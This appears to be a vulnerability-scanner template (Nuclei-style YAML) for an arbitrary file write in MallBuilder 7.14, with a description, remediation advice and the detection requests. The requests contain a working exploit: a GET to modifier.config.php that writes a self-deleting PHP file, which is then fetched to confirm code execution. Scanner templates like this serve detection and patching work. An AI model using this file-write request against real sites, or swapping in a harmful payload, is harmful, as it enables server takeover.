id: Mallbuilder714-getshell
info:
  name: Mallbuilder 7.14 lib/smarty/plugins/modifier.config.php file write getshell
  author:
  - l0ne1y
  description: |-
    MallBuilder arbitrary file write vulnerability
    MallBuilder is a multi-user online mall solution based on PHP+MYSQL. Using MallBuilder, one can quickly build a powerful online mall similar to JD, Tmall, or Yihaodian, or an enterprise, industry, localized, and vertical multi-user mall.

    MallBuilder multi-user mall management system v7.14 has an arbitrary file write vulnerability. An attacker can exploit it to write and execute PHP files.
  severity: critical
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    http://www.mall-builder.com/

    Temporary Fix:
    1. Filter the parameters passed to the modifier.config.php file.
    2. Strictly restrict the creation of files that can modify server configuration, such as .htaccess.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code_1==404&&status_code_2==200
    - contains(body_3,"c4ca4238a0b923820dcc509a6f75849b")
  matchers-condition: and
  path:
  - '{{BaseURL}}/lib/smarty/plugins/test.php'
  - '{{BaseURL}}/lib/smarty/plugins/modifier.config.php?codelock_filed=.&codelock_mastersize=3&codelock_act=3&codelock_enc=test.php&codelock_masterdata=<?php%20echo%20md5(1);unlink(__FILE__);?>'
  - '{{BaseURL}}/lib/smarty/plugins/test.php'
  method: GET
